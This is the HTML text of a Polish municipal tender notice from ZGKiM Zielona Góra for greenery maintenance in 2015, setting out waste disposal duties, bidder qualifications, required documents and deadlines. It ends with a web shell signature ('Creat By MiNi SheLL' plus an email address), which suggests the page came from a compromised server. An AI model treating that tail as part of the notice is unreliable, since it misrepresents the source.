1.Wykonawca we własnym zakresie i na własny koszt powinien każdorazowo, odpowiednio zabezpieczyć rejon prac związanych z realizacją przedmiotu zamówienia, oraz bezzwłocznie pod koniec każdego dnia pracy uporządkować teren na którym prowadzona była usługa, a w szczególności zgrabić pozostałości (skoszona trawa, przycięte gałęzie itp.), wszelkie inne zanieczyszczenia pozostawione uporządkować bezpośrednio przed świętami  i dniami wolnymi od pracy. Wykonawca winien dokonać załadunku zgromadzonych pozostałości oraz środkami transportu własnego, wywieźć je do miejsca utylizacji tego typu odpadów.  
2.Odpady pochodzące z oczyszczania terenu, grabienia i koszenia trawników, cięcia krzewów, odchwaszczania i zamiatania będą wywożone do Działu Zagospodarowania Odpadów ZGKiM w Zielonej Górze ul. Wrocławska 73 lub Wykonawca tj. posiadacz odpadów - zgodnie z ustawą o odpadach z dnia 14 grudnia 2012r. (Dz. U. z dnia 8 stycznia 2013r, Nr 0 poz. 21) może przekazać określone rodzaje odpadów w celu ich wykorzystania osobie fizycznej lub jednostce organizacyjnej, nie będącym przedsiębiorcami, na ich własne potrzeby. Rozporządzenie z dnia 19 grudnia 2008r. (Dz. U. z 2008r nr 235 poz. 1614), określa listę odpadów, które posiadacz odpadów może przekazać osobom fizycznym lub jednostkom organizacyjnym nie będącym przedsiębiorcami oraz dopuszczalnych metod ich odzysku, np. odpady ulegające biodegradacji.
W przypadku przekazania odpadów ulegających biodegradacji osobie fizycznej lub jednostce organizacyjnej nie będącej przedsiębiorcą Wykonawca winien przedstawić Zamawiającemu stosowne oświadczenie przyjmującego odpady - ze wskazaniem, iż odpady te będą wykorzystywane na własne potrzeby, np. w ramach gospodarstwa domowego, w tym na terenie swojej nieruchomości lub w zakresie swojego działania.
3.Wykonawca zobowiązany jest do przechowywania przez 1 rok dokumentów stwierdzających przyjęcie na wysypisko odpadów, o których mowa w pkt. 1 lub stosownych oświadczeń i okazywanie ich na żądanie Zamawiającego.
4.Wykonawca powinien posiadać zezwolenie odpowiednich organów na transport z terenu Miasta odpadów komunalnych tj.; odpady ulegające biodegradacji, 200202 - gleba i ziemia, w tym kamienie, 200203 - inne odpady nie ulegające biodegradacji - zgodnie z Rozporządzeniem Ministra Środowiska, z dnia 27 września 2001r, w sprawie katalogu odpadów, dz. ust 112., poz. 1206
5.Wykonawcy posiadający zezwolenie na transport poza Miastem Zielona Góra powinni posiadać uzyskane w Zakładzie Gospodarki Komunalnej i Mieszkaniowej w Zielonej Górze potwierdzenie gotowości przyjęcia odpadów na składowisko odpadów przy ul. Wrocławskiej 73..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielanie zamówień uzupełniających, zgodnie z art.67, ust.1, pkt.6) ustawy, stanowiących do 50% wartości zamówienia podstawowego, realizowanych w przypadku konieczności zwiększenia ilości wykonywanych usług bądź w przypadku wystąpienia dodatkowych terenów przeznaczonych do świadczenia usługi w zakresie i w ramach zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 77.31.41.00-5, 77.34.20.00-9, 77.31.21.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku
Ocena spełnienia warunku będzie dokonywana metodą 0 - 1, tj. nie spełnia/spełnia, w oparciu o oświadczenie dołączone do oferty, którego wzór stanowi załącznik nr 2.1. do formularza oferty będącego integralną częścią SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien posiadać doświadczenie w wykonaniu minimum 2  usług, których przedmiotem było wykonywanie prac związanych z utrzymaniem/pielęgnacją zieleni na terenach zewnętrznych o wartości co najmniej 100 tyś złotych w ramach każdej umowy. (Zamawiający nie dopuszcza sumowania umów celem uzyskania wymaganego warunku kwotowego).
Na potwierdzenie spełnienia warunku należy złożyć wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie wg załącznika nr 5 do SIWZ. 	
Ocena spełnienia warunku udziału w postępowaniu będzie dokonywana metodą 0 - 1, tj. nie spełnia/spełnia, w oparciu o dołączone oświadczenia, dokumenty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować odpowiednim potencjałem technicznym tj. następującymi narzędziami i urządzeniami technicznymi w pełni sprawnymi nie powodującymi uciążliwości dla środowiska, w ilości minimum:
- kosiarka spalinowa -  1 szt., 
- samochód  z przyczepą skrzyniową o ładowności pow. 1t., - 1 szt.,
- kosa spalinowa - 1 szt., 
- zbiornik na wodę z oprzyrządowaniem do podlewania o pojemności 1000l. 1 szt.
W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć:
- wykaz potencjału technicznego wraz z podstawą dysponowania, którego wzór stanowi załącznik nr 4 do formularza oferty, będącego integralną częścią SIWZ.
Ocena spełnienia warunku udziału w postępowaniu będzie dokonywana metodą 0 - 1, tj. nie spełnia/spełnia, w oparciu o dołączone oświadczenia, dokumenty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować następującymi osobami:
-   min. jednym pracownikiem posiadającym średnie wykształcenie ogrodnicze;
- min. jednym pracownikiem posiadającym aktualne orzeczenie lekarskie stwierdzające brak przeciwwskazań do pracy przy użyciu maszyn wywołujących drgania mechaniczne oraz zaświadczenie o odbyciu z wynikiem pozytywnym szkolenia kursowego dla drwali - operatorów pilarek z zakresu pracy i jej obsługi.
W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć - wykaz osób/podmiotów, które będą uczestniczyć w wykonywaniu zamówienia wraz z podstawą dysponowania, którego  wzór stanowi załącznik nr 3 do formularza oferty, będącego integralną częścią SIWZ.
Ocena spełnienia warunku udziału w postępowaniu będzie dokonywana metodą 0 - 1, tj. nie spełnia/spełnia, w oparciu o dołączone oświadczenia, dokumenty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien posiadać opłaconą polisę a w przypadku jej braku inny dokument potwierdzający że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę gwarancyjną min. 100 tyś. PLN. 
Ocena spełnienia warunku udziału w postępowaniu będzie dokonywana metodą 0 - 1, tj. nie spełnia/spełnia, w oparciu o dołączone oświadczenia, dokumenty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający zastrzega sobie prawo do zmniejszenia zakresu prac lub rezygnacji z części zamówienia.
2. Okolicznościami powodującymi zmniejszenie zakresu prac lub rezygnację z części zamówienia są:
1)  klęski żywiołowe, 
2) akty wandalizmu i dewastacje o dużych rozmiarach.
3. Zamawiający zastrzega możliwość zmian dotyczących doboru gatunkowego roślin i ich ilości zawartych w SIWZ w ramach przedmiotu zamówienia, zgodnie z kosztorysem ofertowym.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgkim.zgora.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarki Komunalnej i Mieszkaniowej, ul. Zjednoczenia 110, 65-120 Zielona Góra, pokój 101.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.01.2015 godzina 08:00, miejsce: Zakład Gospodarki Komunalnej i Mieszkaniowej, ul. Zjednoczenia 110, 65-120 Zielona Góra, w kancelarii lub w pokoju 101.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com